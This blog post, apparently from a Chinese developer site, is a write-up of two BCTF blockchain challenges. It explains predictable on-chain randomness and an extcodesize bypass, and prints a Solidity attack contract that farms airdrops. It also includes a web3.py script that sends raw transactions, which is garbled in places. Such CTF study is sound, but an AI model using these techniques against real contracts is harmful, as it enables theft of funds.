Bctf Blockchain 两则详解——带你玩转区块链

最新推荐文章于 2024-09-27 14:41:20 发布
最新推荐文章于 2024-09-27 14:41:20 发布
阅读量3k 收藏 20
点赞数 6

近来各大ctf中,纷纷冒出了一个新题型——Blockchain,从HCTF开始到BCTF,作为一只web狗,还是要紧跟时代学习一下(毕竟web狗啥都要学),今天我们就来详细讨论一下这两题的解法,以及用到的知识点。

EOSGame

题目地址为:This contract is at 0x804d8B0f43C57b5Ba940c1d1132d03f1da83631F in Ropsten network.

这题是给了合约代码的,先贴一下合约代码:

contract EOSToken{
    using SafeMath for uint256;
    string TokenName = "EOS";
    uint256 totalSupply = 100**18;
    address owner;
    mapping(address => uint256)  balances;

    modifier onlyOwner() {
        require(msg.sender == owner);
        _;
    }
    constructor() public{
        owner = msg.sender;
        balances[owner] = totalSupply;
    }
    function mint(address _to,uint256 _amount) public onlyOwner {
        require(_amount < totalSupply);
        totalSupply = totalSupply.sub(_amount);
        balances[_to] = balances[_to].add(_amount);
    }
    function transfer(address _from, address _to, uint256 _amount) public onlyOwner {
        require(_amount < balances[_from]);
        balances[_from] = balances[_from].sub(_amount);
        balances[_to] = balances[_to].add(_amount);
    }
    function eosOf(address _who) public constant returns(uint256){
        return balances[_who];
    }
}

contract EOSGame{
    using SafeMath for uint256;
    mapping(address => uint256) public bet_count;
    uint256 FUND = 100;
    uint256 MOD_NUM = 20;
    uint256 POWER = 100;
    uint256 SMALL_CHIP = 1;
    uint256 BIG_CHIP = 20;
    EOSToken  eos;

    event FLAG(string b64email, string slogan);

    constructor() public{
        eos=new EOSToken();
    }
    function initFund() public{
        if(bet_count[tx.origin] == 0){
            bet_count[tx.origin] = 1;
            eos.mint(tx.origin, FUND);
        }
    }
    function bet(uint256 chip) internal {
        bet_count[tx.origin] = bet_count[tx.origin].add(1);
        uint256 seed = uint256(keccak256(abi.encodePacked(block.number)))+uint256(keccak256(abi.encodePacked(block.timestamp)));
        uint256 seed_hash = uint256(keccak256(abi.encodePacked(seed)));
        uint256 shark = seed_hash % MOD_NUM;
        uint256 lucky_hash = uint256(keccak256(abi.encodePacked(bet_count[tx.origin])));
        uint256 lucky = lucky_hash % MOD_NUM;
        if (shark == lucky){
            eos.transfer(address(this), tx.origin, chip.mul(POWER));
        }
    }
    function smallBlind() public {
        eos.transfer(tx.origin, address(this), SMALL_CHIP);
        bet(SMALL_CHIP);
    }
    function bigBlind() public {
        eos.transfer(tx.origin, address(this), BIG_CHIP);
        bet(BIG_CHIP);
    }
    function eosBlanceOf() public view returns(uint256) {
        return eos.eosOf(tx.origin);
    }
    function CaptureTheFlag(string b64email) public{
        require (eos.eosOf(tx.origin) > 18888);
        emit FLAG(b64email, "Congratulations to capture the flag!");
    }
}

如果你看不懂?没关系,我准备了,在互联网上找了个不错的视频教程,就无偿奉献给大家了。戳这里 提取码是:uh7p 。

合约内容解析

下面我们先来大体看一下合约的内容:

首先第一个合约是写了一个token,EOSToken,可以理解为一种游戏币(毕竟ctf就是一场游戏,23333)

然后两个合约都使用了这么一句:

using SafeMath for uint256;

这里主要是为了防止溢出的,溢出?没错,在智能合约中,如果没有对某些数据类型进行限制,确实会导致溢出,这也导致了很多攻击的产生。详细分析戳这里

然后我们先看看怎么才能获取flag,很容易找到限制条件:

require (eos.eosOf(tx.origin) > 18888);

只要我们的EOSToken是大于18888的,就能成功获得flag了。

然后我们来看这个game的具体逻辑:

这个函数是如果你第一次玩这个游戏,会给你发放100个token。

下面到了整个游戏的关键函数bet:

这是一个赌钱函数,首先会生成一个随机数,然后用你当前账户的赌博次数在生成一个随机数,同时对20取余,如果两个余数相等,那么会给你你赌资的100倍奖励,这里就涉及到了我们本题的考点了,solidity智能合约随机数预测,有关科普戳这里 。

我理解为 如果生成随机数使用的种子使用的是有关当前区块的有关信息,那就是可以预测的,因为如果使用合约调用合约,那两个交易会被打包在一个区块内,那生成种子的所有信息,攻击合约都可以获得,攻击合约可以利用这些信息,生成完全一样的随机数。

接下来,两个函数,分别是小赌和大赌,赌资分别是1 和 20。

理清攻击流程

那么很显然,我们的攻击流程可以归结如下:

编写攻击合约

合约如下:

获取flag

当你的余额足够了以后,调用当前合约的flag函数,将邮箱的base64作为参数传入,即可获取flag邮件

Fake3D

合约地址:This game is at 0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a in Ropsten network.

贴一下合约代码:

contract WinnerList{
    address public owner;
    struct Richman{
        address who;
        uint balance;
    }

    function note(address _addr, uint _value) public{
        Richman rm;
        rm.who = _addr;
        rm.balance = _value;
    }

}

contract Fake3D {
    using SafeMath for *;
    mapping(address => uint256)  public balance;
    uint public totalSupply  = 10**18;
    WinnerList wlist;

    event FLAG(string b64email, string slogan);

    constructor(address _addr) public{
        wlist = WinnerList(_addr);
    }

    modifier turingTest() {
            address _addr = msg.sender;
            uint256 _codeLength;
            assembly {_codeLength := extcodesize(_addr)}
            require(_codeLength == 0, "sorry humans only");
            _;
    }

    function transfer(address _to, uint256 _amount) public{
        require(balance[msg.sender] >= _amount);
        balance[msg.sender] = balance[msg.sender].sub(_amount);
        balance[_to] = balance[_to].add(_amount);
    }


    function airDrop() public turingTest returns (bool) {
        uint256 seed = uint256(keccak256(abi.encodePacked(
            (block.timestamp).add
            (block.difficulty).add
            ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)).add
            (block.gaslimit).add
            ((uint256(keccak256(abi.encodePacked(msg.sender)))) / (now)).add
            (block.number)
        )));

        if((seed - ((seed / 1000) * 1000)) < 288){
            balance[tx.origin] = balance[tx.origin].add(10);
            totalSupply = totalSupply.sub(10);
            return true;
        }
        else
            return false;
    }

   function CaptureTheFlag(string b64email) public{
        require (balance[msg.sender] > 8888);
        wlist.note(msg.sender,balance[msg.sender]);
        emit FLAG(b64email, "Congratulations to capture the flag?");
    }

}

浏览一遍,发现是一个很明显的薅羊毛的游戏,但是这里有个判断:

assembly {_codeLength := extcodesize(_addr)}
require(_codeLength == 0, "sorry humans only");

于是搜索到了一篇文章,文章地址

文章中说到,当一个合约在执行构造函数的时候,其extcodesize也为0 ,所以首先写出薅羊毛合约。

攻击合约

这里就借用 r3kapig 队伍写的来测试:

contract father {
    function father() payable {}
    Son son;
    function attack(uint256 times) public {
        for(uint i=0;i<times;i++){
            son = new Son();
        }
    }
    function () payable {
    }
}
contract Son {
    function Son() payable {
        Fake3D f3d;
        f3d=Fake3D(0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a);
        f3d.airDrop();
        if (f3d.balance(this)>=10)
        {
            f3d.transfer(0x357ec8b9f62e8a3ca819eebd49a793045b8b1e91,10);
        }
        selfdestruct(0x357ec8b9f62e8a3ca819eebd49a793045b8b1e91);
    }
    function () payable{
    }
}

这样调用 attack(150) 一次,大概可以得到400的收益,调用20次左右即可达到要求。

可以通过写脚本,来不断调用这个方法,脚本如下:

但是在达到要求之后,在调用getflag的过程中遇到了问题,总是调用失败。

继续探索

于是想到了可能 合约WinnerList 给出的代码不准确,于是调用脚本去读取整整WinnerList 合约的地址:

得到了WinnerList 的实际地址为:0xd229628fd201a391cf0c4ae6169133c1ed93d00a

于是反编译:https://ethervm.io/decompile?address=0xd229628fd201a391cf0c4ae6169133c1ed93d00a&network=ropsten

在反编译的函数中发现了一个关键判断:

总结一下就是调用的地址最后两位必须是43 或者倒数三四位必须是b1 。

这里使用工具爆破一下,得到合法的地址:

获取flag

我们先将token 通过tranfer方法交易给满足条件的账户,然后再调用flag函数:

即可完成整个的交易,获取flag。

脚本如下:


from web3 import Web3import sha3

my_ipc = Web3.HTTPProvider("https://ropsten.infura.io/v3/2b86c426683f4a6095fd175fe931d799")
assert my_ipc.isConnected()
runweb3 = Web3(my_ipc)
myaccount = "your account"private = "your private key"constract = "0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a"
transaction_dict1 = {        
    'from':Web3.toChecksumAddress(myaccount),       
    'to':constract,        
    'gasPrice':10000000000, 
    'gas':3000000,        
    'nonce': None,        
    'value':0,        
    'data': 
"0xa9059cbb000000000000000000000000c918033c74054a190ed8004fdadf1b53f04a05430000000000000000000000000000000000000000000000000000000000002328"
    } # 原来账户转账给爆破出的账户 
tranfertransaction_dict = {        
    'from':Web3.toChecksumAddress(myaccount),        
    'to':constract,        
    'gasPrice':10000000000, 
    'gas':3000000,        
    'nonce': None,        
    'value':0,   
    'data': 
"0x9590729100000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000021205933567464486831616d6c68596d6c755147647459576c734c6d4e7662513d3d00000000000000000000000000000000000000000000000000000000000000"
    } # 满足要求的账户调用flag函数def init():
    myNonce = runweb3.eth.getTransactionCount(Web3.toChecksumAddress(myaccount))
    print(myNonce)
    transaction_dict["nonce"] = myNonce
    r = runweb3.eth.account.signTransaction(transaction_dict, private)   
 try:
      runweb3.eth.sendRawTransaction(r.rawTransaction.hex())    
except:        
      passif __name__ == '__main__':    while True:
      init()

后记

作为一只刚入门这个方向的半小白,从一无所知花了几天时间慢慢了解了这些东西,觉得做这些题目还挺有意思的,当然可能有很多笨拙的地方,还请大佬们多多指教。

FLy_鹏程万里
关注
专栏目录
BCTF_Writeups
03-14
百度杯BCTF线上赛前8名队伍的Writeup,大家可以学习一下,推荐看217写的。
玩转堆-堆漏洞的利用技巧.docx
01-10
了解内存管理的策略是玩转堆漏洞的关键。 二、堆溢出的利用思想与防护策略 堆溢出的利用思想是破坏堆内存管理的相关数据结构,如 arena、bin、chunk,或者破坏堆内存中的用户数据,如覆盖变量指针、函数指针、数据...
主要用于在CTF比赛中攻克Blockchain方向的题目
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。
探索未来科技:CTF-Blockchain —— 一个创新的区块链安全挑战平台
gitblog_00061的博客
04-13 596
探索未来科技:CTF-Blockchain —— 一个创新的区块链安全挑战平台 去发现同类优质开源项目:https://gitcode.com/ 简介 是一款面向网络安全爱好者和专业人士的在线平台,它将传统的Capture The Flag(CTF)竞赛模式与区块链技术相结合,为学习、实践和提升区块链安全性提供了全新的途径。 技术分析 区块链集成:CTF-Blockchain 利用区块链的分布...
Openzeppelin区块链CTF练习——答案和解析【15】GataKeeperTwo
weixin_43458715的博客
09-22 403
Openzeppelin区块链CTF练习——答案和解析【15】GataKeeperTwo
CTF的区块链入门资料
热门推荐
soldi_er的博客
10-11 1万+
文章目录编写课件的心路历程 编写课件的心路历程 查找半个小时,发现CTF区块链的资料很少,稍微有点慌。 在找到 登链社区 查看几篇相关的文章后,发现跟 Re 比较相关,智能合约部分有时会用到反汇编和代码审计。更重要的是,看到的几道CTF题目,多半与智能合约相关,心理阴影面积一时较大。 不过只是入门课程,讲太深了大家也听不懂。简单讲解一下区块链、CTF、两道题目,差不多就可以了,主要为学员提供整体的初步了解、以及后续的学习方向。 编写主要思路:先根据 《MasterBitcoin》 整理一下区块链的概念,搭配
[区块链安全-CTF Protocol]区块链智能合约安全实战(已完结)
wangluoanquan111的博客
01-23 1623
这次是尝试CTF-PROTOCOL的题目,望与诸君共勉。后面应该会参考DeFiHackLabs推出对一些列攻击的POC手写和解析,同时还要参加Hackathon。大家一起努力!
supercard游戏系统开发
chihunteng1211的博客
08-22 186
supercard系统开发,supercard平台系统开发超级卡牌系统开发,supercard游戏区块链技术开发,supercard游戏软件模式开发 随着区块链概念的火爆,越来越多的领域都开始尝试与区块链技术结合,游戏与区块链的结合更是被广泛看好。 区块链游戏格外被看好,可能的原因...
BCTF-Writeups.rar
09-30
【标题】:“BCTF-Writeups.rar”是一个关于网络安全竞赛BCTF的解题报告集合,其中可能包含了参赛者们对于比赛中的各种技术挑战的分析、解决方案和心得。 【描述】:这个压缩包文件“BCTF-Writeups.rar”暗示了其...
2016 bctf exploit bcloud 400.rar
09-30
【标题】"2016 bctf exploit bcloud 400.rar" 提供的信息表明,这是一个关于2016年网络安全竞赛“蓝帽杯”(Bluehat Challenge)中的一个漏洞利用案例,目标是“bcloud”系统,难度级别为400。在信息安全领域,...
2014BCTF re400.rar
09-30
2014BCTF re400.rar
CTF之Web_python_block_chain
qq_74263993的博客
05-26 1117
然后再看看这里的51% 攻击,其实这里说的51%是指算力,也就是这种攻击需要攻击者具备全网51%的算力,因为这样才有机会使自己生成(挖出)区块的速度超过其他人,然后按区块链的规则:当出现分叉时,区块链的规则认最长的分链为主链,并舍去原有的链,就达到了撤销原来链上已经存在的交易,拿回该交易使用了的钱的目的,这里我的另一个理解就是可以使交易回滚,从而追回被盗的钱。0确认就同样的道理了,那就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。
ctf 区块链_“中科金财区块链”通过网信办区块链信息服务备案
weixin_39670441的博客
10-26 299
4月24日,国家互联网信息办公室发布第三批境内区块链信息服务备案编号,“中科金财区块链”成功入选。‍中科金财区块链(Sinodata Chain)是由北京中科金财科技股份有限公司研发的企业级区块链基础平台,致力于为客户提供区块链技术、产品、解决方案及区块链架构咨询服务。‍中科金财区块链通过不断的突破创新,累积了大量的区块链核心技术,并与重要龙头合作伙伴携手共建“区块链平台+多领域应用”...
ccf-区块链(80分)
weixin_45342551的博客
10-04 412
题目: 在一个分布式网络中,有n个节点通过m条边相连,节点编号从1至n。每个节点初始化都有一个相同的“创世块”,链长都为1,每个节点在整个过程中都需要维护一条主链,任何操作都只在主链上进行。在整个系统中产生的每个新块都有唯一的整数编号,创始块的编号为0,其余块的编号都为正整数。当某个节点的链更新时,会将它的主链发送给它相邻的节点(邻居);而当节点收到链时,决定是否更新自己的主链下列情况可能会导致某个节点的链更新: ·某个节点接收到邻居发送过来的链,与当前自己的主链进行比较:如果接收到的链更长,则将其作为自己
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1244
NKCTF WP
Openzeppelin区块链CTF练习——答案和解析【18】Recovery
最新发布
weixin_43458715的博客
09-27 311
Openzeppelin区块链CTF练习——答案和解析【18】Recovery
改进的CTF竞赛中区块链题发邮件脚本,主要解决重复发邮件问题。
fjh1997的博客
05-07 1640
# -*- coding:UTF-8 -*- from web3 import Web3,HTTPProvider import os import time import binascii import base64 import smtplib from email.mime.text import MIMEText from email.header import Header contr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值